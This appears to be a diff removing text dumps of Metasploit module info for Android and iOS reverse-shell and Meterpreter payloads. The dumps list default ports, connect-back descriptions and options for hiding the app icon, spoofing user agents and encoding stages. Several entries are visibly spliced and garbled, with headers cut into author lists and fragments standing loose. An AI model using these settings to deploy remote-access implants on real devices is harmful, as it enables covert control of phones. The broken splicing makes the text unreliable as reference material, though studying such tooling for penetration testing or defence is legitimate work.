AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
|
||||
AndroidWakelock true no Acquire a wakelock before starting the payload
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,58 +0,0 @@
|
||||
|
||||
Name: Android Meterpreter Shell, Reverse HTTP Inline
|
||||
Module: payload/android/meterpreter_reverse_http
|
||||
Platform: Android
|
||||
Arch: dalvik
|
||||
Needs Admin: No
|
||||
|
||||
Evasion options for payload/android/meterpreter_reverse_http:
|
||||
=========================
|
||||
|
||||
g Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8080 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
Description:
|
||||
Connect back to attacker and spawn a Meterpreter shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
||||
HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,60 +0,0 @@
|
||||
|
||||
Name: Android Meterpreter Shell, Reverse HTTPS Inline
|
||||
Module: payload/android/meterpreter_reverse_https
|
||||
Platform: Android
|
||||
Arch: dalvik
|
||||
Needs Admin: No
|
||||
|
||||
Evasion options for payload/android/meterpreter_reverse_https:
|
||||
=========================
|
||||
|
||||
Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8443 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
Description:
|
||||
Connect back to attacker and spawn a Meterpreter shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
||||
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,54 +0,0 @@
|
||||
|
||||
Name: Android Meterpreter Shell, Reverse TCP Inline
|
||||
Module: payload/android/meterpreter_reverse_tcp
|
||||
Platform: Android
|
||||
Arch: dalvik
|
||||
Needs Admin: No
|
||||
Total size: 74177
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
Description:
|
||||
Connect back to the attacker and spawn a Meterpreter shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,63 +0,0 @@
|
||||
|
||||
Name: Command Shell, Android Reverse HTTP Stager
|
||||
Module: payload/android/shell/reverse_http
|
||||
Platform: Android
|
||||
Arch: dalvik
|
||||
Needs Admin: N
|
||||
Evasion options for payload/android/shell/reverse_http:
|
||||
=========================
|
||||
|
||||
asploit.com>
|
||||
anwarelmakrahy
|
||||
OJ Reeves
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8080 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
Description:
|
||||
Spawn a piped command shell (sh).
|
||||
|
||||
Tunnel communication over HTTP
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AndroidHideAppIcon false no Hide the application icon automatically after launch
|
||||
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
|
||||
AndroidWakelock true no Acquire a wakelock before starting the payload
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
HttpCookie no An optional value to use for the Cookie HTTP header
|
||||
HttpHostHeader no An optional value to use for the Host HTTP header
|
||||
HttpReferer no An optional value to use for the Referer HTTP header
|
||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
||||
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,66 +0,0 @@
|
||||
|
||||
Name: Command Shell, Android Reverse HTTPS Stager
|
||||
Module: payload/android/shell/reverse_https
|
||||
Platform: Android
|
||||
Arch: dalvik
|
||||
Needs Admin: N
|
||||
Evasion options for payload/android/shell/reverse_https:
|
||||
=========================
|
||||
|
||||
sploit.com>
|
||||
anwarelmakrahy
|
||||
OJ Reeves
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8443 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
Description:
|
||||
Spawn a piped command shell (sh).
|
||||
|
||||
Tunnel communication over HTTPS
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AndroidHideAppIcon false no Hide the application icon automatically after launch
|
||||
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
|
||||
AndroidWakelock true no Acquire a wakelock before starting the payload
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format
|
||||
HttpCookie no An optional value to use for the Cookie HTTP header
|
||||
HttpHostHeader no An optional value to use for the Host HTTP header
|
||||
HttpReferer no An optional value to use for the Referer HTTP header
|
||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
||||
HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,54 +0,0 @@
|
||||
|
||||
Name: Command Shell, Android Reverse TCP Stager
|
||||
Module: payload/android/shell/reverse_tcp
|
||||
Platform: Android
|
||||
Arch: dalvik
|
||||
Needs Admin: No
|
||||
Total size: 10209
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
mihi
|
||||
egypt <egypt@metasploit.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
Description:
|
||||
Spawn a piped command shell (sh).
|
||||
|
||||
Connect back stager
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AndroidHideAppIcon false no Hide the application icon automatically after launch
|
||||
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
|
||||
AndroidWakelock true no Acquire a wakelock before starting the payload
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,64 +0,0 @@
|
||||
|
||||
Name: Apple_iOS Meterpreter, Reverse HTTP Inline
|
||||
Module: payload/apple_ios/aarch64/meterpreter_reverse_http
|
||||
Platform: Apple_iOS
|
||||
Arch: aarch64
|
||||
Needs Admin: No
|
||||
Total size: 796904
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Adam Cammack <adam_cammack@rapid7.com>
|
||||
Brent Cook <brent_cook@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8080 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
Description:
|
||||
Run the Meterpreter / Mettle server payload (stageless)
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
||||
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,65 +0,0 @@
|
||||
|
||||
Name: Apple_iOS Meterpreter, Reverse HTTPS Inline
|
||||
Module: payload/apple_ios/aarch64/meterpreter_reverse_https
|
||||
Platform: Apple_iOS
|
||||
Arch: aarch64
|
||||
Needs Admin: No
|
||||
Total size
|
||||
Evasion options for payload/apple_ios/aarch64/meterpreter_reverse_https:
|
||||
=========================
|
||||
|
||||
<brent_cook@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8443 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
Description:
|
||||
Run the Meterpreter / Mettle server payload (stageless)
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
||||
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
